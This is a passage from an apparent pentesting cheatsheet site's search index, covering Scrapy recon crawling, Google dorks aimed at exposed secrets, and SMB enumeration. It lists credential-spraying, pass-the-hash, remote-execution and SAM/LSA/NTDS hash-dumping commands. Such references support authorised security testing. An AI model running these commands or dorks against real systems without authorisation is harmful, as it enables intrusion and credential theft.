overrides)\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSetting\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eROBOTSTXT_OBEY\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWhether to honour robots.txt (default \u003ccode\u003eTrue\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eDOWNLOAD_DELAY\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSeconds between requests (politeness / rate limiting)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eCONCURRENT_REQUESTS\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMax simultaneous requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eDEPTH_LIMIT\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMax crawl depth (0 = unlimited)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eUSER_AGENT\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom User-Agent string\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eRETRY_TIMES\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNumber of retries on failed requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eHTTPCACHE_ENABLED\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCache responses locally to avoid re-fetching\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eAUTOTHROTTLE_ENABLED\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAuto-adjust delay based on server load\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Example: stealthier crawl\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl recon \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -s DOWNLOAD_DELAY\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e2\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -s CONCURRENT_REQUESTS\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e2\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -s AUTOTHROTTLE_ENABLED\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eTrue \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -s USER_AGENT\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"notes\"\u003eNotes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eActive\u003c/strong\u003e — Scrapy makes real HTTP requests to the target; only crawl in-scope assets.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eROBOTSTXT_OBEY=False\u003c/code\u003e only when authorised; by default Scrapy respects robots.txt.\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003eDOWNLOAD_DELAY\u003c/code\u003e / \u003ccode\u003eAUTOTHROTTLE\u003c/code\u003e to avoid hammering targets and tripping WAFs.\u003c/li\u003e\n\u003cli\u003eGreat base for custom recon crawlers — [[reconspider]] is a Scrapy-based spider built exactly for this.\u003c/li\u003e\n\u003cli\u003eExport to JSON/JSONL then post-process with \u003ccode\u003ejq\u003c/code\u003e to extract emails, subdomains, and links.\u003c/li\u003e\n\u003c/ul\u003e","title":"Scrapy"},{"content":"Search Operators (Google Dorking) Cheatsheet Type: Passive reconnaissance using advanced search-engine operators to surface exposed files, directories, credentials, subdomains, and metadata without touching the target\nCore Operators Operator Description Example site: Restrict results to a domain site:example.com inurl: Term appears in the URL inurl:admin intitle: Term appears in the page title intitle:\u0026quot;index of\u0026quot; intext: Term appears in the body text intext:password filetype: / ext: Restrict to a file extension filetype:pdf cache: Show Google\u0026rsquo;s cached copy cache:example.com related: Find similar sites related:example.com link: Pages linking to a URL (deprecated/limited) link:example.com define: Dictionary definition define:reconnaissance AROUND(n) Terms within n words of each other admin AROUND(3) password Operator Modifiers Modifier Description Example \u0026quot;...\u0026quot; Exact phrase match \u0026quot;confidential\u0026quot; - Exclude a term site:example.com -www OR / | Logical OR site:example.com (filetype:pdf OR filetype:docx) AND Logical AND (implicit) intitle:login AND inurl:admin * Wildcard / placeholder \u0026quot;username * password\u0026quot; ( ) Group terms site:example.com (admin OR login) .. Number range \u0026quot;budget 2020..2024\u0026quot; \u0026ldquo;all\u0026rdquo; Variants Operator Description allintitle: All following words must be in the title allinurl: All following words must be in the URL allintext: All following words must be in the body allinanchor: All following words must be in anchor text Note: all* operators don\u0026rsquo;t mix well with other operators — use the single-term versions (intitle:, inurl:) when combining.\nFinding Exposed Files \u0026amp; Directories # Open directory listings site:example.com intitle:\u0026#34;index of\u0026#34; intitle:\u0026#34;index of\u0026#34; \u0026#34;parent directory\u0026#34; # Backup and config files site:example.com ext:bak OR ext:old OR ext:backup site:example.com filetype:env site:example.com inurl:wp-config.php # Database dumps site:example.com ext:sql OR ext:db OR ext:dbf intext:\u0026#34;-- phpMyAdmin SQL Dump\u0026#34; # Log files site:example.com ext:log Finding Documents \u0026amp; Metadata # Office documents and PDFs (good for metadata harvesting) site:example.com filetype:pdf site:example.com (filetype:doc OR filetype:docx OR filetype:xls OR filetype:xlsx) # Configuration / credentials in text site:example.com ext:txt intext:password site:example.com filetype:xml inurl:config Finding Login Portals \u0026amp; Admin Panels site:example.com inurl:admin site:example.com (inurl:login OR inurl:signin OR intitle:login) site:example.com inurl:portal intitle:\u0026#34;Dashboard\u0026#34; inurl:admin Subdomain \u0026amp; Asset Discovery # Enumerate indexed subdomains (exclude main www) site:*.example.com -www # Find specific tech / paths site:example.com inurl:api site:example.com inurl:dev OR inurl:staging OR inurl:test Sensitive Information Exposure # Credentials and keys intext:\u0026#34;BEGIN RSA PRIVATE KEY\u0026#34; site:example.com intext:\u0026#34;password\u0026#34; filetype:log \u0026#34;index of\u0026#34; \u0026#34;id_rsa\u0026#34; # Exposed environment / secrets site:example.com ext:env \u0026#34;DB_PASSWORD\u0026#34; intitle:\u0026#34;index of\u0026#34; \u0026#34;.git\u0026#34; # Error messages leaking info site:example.com intext:\u0026#34;sql syntax near\u0026#34; OR intext:\u0026#34;Warning: mysql_\u0026#34; Other Search Engines Engine Notable Operators / Notes Bing Supports site:, filetype:, inbody:, intitle:, ip:\u0026lt;addr\u0026gt; (find sites on an IP) DuckDuckGo Supports site:, filetype:, intitle:, inurl:; !bang shortcuts Yandex Strong operator support; often indexes content others miss Shodan Device/banner search — hostname:, port:, org:, ssl: (not a web dork engine but pairs well) Resources # Google Hacking Database (GHDB) — huge curated dork collection https://www.exploit-db.com/google-hacking-database # DorkSearch / pre-built dork generators https://dorksearch.com Notes Passive — queries hit the search engine, not the target; nothing is sent to the victim\u0026rsquo;s infrastructure. Results reflect what\u0026rsquo;s been indexed — combine with crawling tools like [[scrapy]] / [[reconspider]] for live, unindexed content. Aggressive automated dorking can trigger Google CAPTCHAs / rate limits — throttle and rotate where needed. Always validate findings; cached or stale results may not reflect the current site state. Use only against assets you\u0026rsquo;re authorised to test — exposed data is still owned by the target. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/search-engine/search-operators/","summary":"\u003ch1 id=\"search-operators-google-dorking-cheatsheet\"\u003eSearch Operators (Google Dorking) Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Passive reconnaissance using advanced search-engine operators to surface exposed files, directories, credentials, subdomains, and metadata without touching the target\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"core-operators\"\u003eCore Operators\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eOperator\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eExample\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRestrict results to a domain\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:example.com\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003einurl:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTerm appears in the URL\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003einurl:admin\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintitle:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTerm appears in the page title\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintitle:\u0026quot;index of\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintext:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTerm appears in the body text\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintext:password\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003efiletype:\u003c/code\u003e / \u003ccode\u003eext:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRestrict to a file extension\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003efiletype:pdf\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ecache:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow Google\u0026rsquo;s cached copy\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ecache:example.com\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003erelated:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFind similar sites\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003erelated:example.com\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003elink:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePages linking to a URL (deprecated/limited)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003elink:example.com\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003edefine:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDictionary definition\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003edefine:reconnaissance\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eAROUND(n)\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTerms within n words of each other\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eadmin AROUND(3) password\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"operator-modifiers\"\u003eOperator Modifiers\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eModifier\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eExample\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e\u0026quot;...\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExact phrase match\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e\u0026quot;confidential\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExclude a term\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:example.com -www\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eOR\u003c/code\u003e / \u003ccode\u003e|\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eLogical OR\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:example.com (filetype:pdf OR filetype:docx)\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eAND\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eLogical AND (implicit)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintitle:login AND inurl:admin\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e*\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWildcard / placeholder\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e\u0026quot;username * password\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e( )\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eGroup terms\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:example.com (admin OR login)\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e..\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNumber range\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e\u0026quot;budget 2020..2024\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"all-variants\"\u003e\u0026ldquo;all\u0026rdquo; Variants\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eOperator\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eallintitle:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAll following words must be in the title\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eallinurl:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAll following words must be in the URL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eallintext:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAll following words must be in the body\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eallinanchor:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAll following words must be in anchor text\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cblockquote\u003e\n\u003cp\u003eNote: \u003ccode\u003eall*\u003c/code\u003e operators don\u0026rsquo;t mix well with other operators — use the single-term versions (\u003ccode\u003eintitle:\u003c/code\u003e, \u003ccode\u003einurl:\u003c/code\u003e) when combining.\u003c/p\u003e","title":"Search Operators"},{"content":"SMB Enumeration Cheatsheet Default Ports: 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP)\nInitial Scanning nmap -p 139,445 -sV \u0026lt;ip\u0026gt; nmap -p 445 --script smb-os-discovery \u0026lt;ip\u0026gt; nmap -p 445 --script smb-security-mode \u0026lt;ip\u0026gt; nmap -p 445 --script smb2-security-mode \u0026lt;ip\u0026gt; nmap -p 139,445 --script smb-* \u0026lt;ip\u0026gt; # All SMB scripts nmap -p 445 --script smb-vuln-* \u0026lt;ip\u0026gt; # All vuln checks NetBIOS / NBT Scanning nbtscan \u0026lt;ip\u0026gt; nbtscan -r 192.168.1.0/24 nmblookup -A \u0026lt;ip\u0026gt; enum4linux / enum4linux-ng # Classic enum4linux -a \u0026lt;ip\u0026gt; # All checks enum4linux -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; \u0026lt;ip\u0026gt; # Authenticated enum4linux -S \u0026lt;ip\u0026gt; # Shares only enum4linux -U \u0026lt;ip\u0026gt; # Users only enum4linux -P \u0026lt;ip\u0026gt; # Password policy # Newer (recommended) enum4linux-ng -A \u0026lt;ip\u0026gt; enum4linux-ng -A \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; enum4linux-ng -A \u0026lt;ip\u0026gt; -oA output smbclient # List shares smbclient -L //\u0026lt;ip\u0026gt;/ -N # Null session smbclient -L //\u0026lt;ip\u0026gt;/ -U \u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt; # Authenticated # Connect to share smbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -N smbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -U \u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt; smbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -U \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt; # Within smbclient shell ls # List files cd \u0026lt;dir\u0026gt; # Change directory get \u0026lt;file\u0026gt; # Download file put \u0026lt;file\u0026gt; # Upload file recurse ON # Enable recursive operations prompt OFF # Disable prompts mget * # Download everything mput * # Upload everything CrackMapExec (CME) # Basic info crackmapexec smb \u0026lt;ip\u0026gt; crackmapexec smb 192.168.1.0/24 # Authenticated enum crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --shares crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --users crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --groups crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --sessions crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --loggedon-users crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --local-groups # Credential spraying crackmapexec smb 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --continue-on-success # Pass-the-Hash crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt; # Command execution crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u0026#39;whoami\u0026#39; # CMD crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u0026#39;whoami\u0026#39; # PowerShell # Dump SAM/LSA crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --sam crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --lsa crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -M ntdsutil # NTDS.dit impacket Tools python3 smbclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; python3 samrdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; python3 rpcdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; python3 lookupsid.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; python3 secretsdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; # Dump all hashes python3 secretsdump.py -just-dc-ntlm \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; Mounting SMB Shares # Linux mount sudo mount -t cifs //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; /mnt/smb -o username=\u0026lt;user\u0026gt;,password=\u0026lt;pass\u0026gt; sudo mount -t cifs //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; /mnt/smb -o username=\u0026lt;user\u0026gt;,password=\u0026lt;pass\u0026gt;,domain=\u0026lt;domain\u0026gt; Key Vulnerabilities CVE Name Description CVE-2017-0144 EternalBlue / MS17-010 SMBv1 RCE — WannaCry / NotPetya CVE-2020-0796 SMBGhost SMBv3.1.1 compression RCE CVE-2021-34527 PrintNightmare Print Spooler RCE via SMB # EternalBlue check nmap -p 445 --script smb-vuln-ms17-010 \u0026lt;ip\u0026gt; use auxiliary/scanner/smb/smb_ms17_010 # SMBGhost check nmap -p 445 --script smb-vuln-cve2020-0796 \u0026lt;ip\u0026gt; use auxiliary/scanner/smb/cve_2020_0796_smbghost ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/smb/","summary":"\u003ch1 id=\"smb-enumeration-cheatsheet\"\u003eSMB Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"initial-scanning\"\u003eInitial Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 139,445 -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-os-discovery \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-security-mode \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb2-security-mode \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 139,445 --script smb-* \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# All SMB scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-vuln-* \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# All vuln checks\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"netbios--nbt-scanning\"\u003eNetBIOS / NBT Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enbtscan \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enbtscan -r 192.168.1.0/24\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmblookup -A \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"enum4linux--enum4linux-ng\"\u003eenum4linux / enum4linux-ng\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Classic\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -a \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# All checks\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; 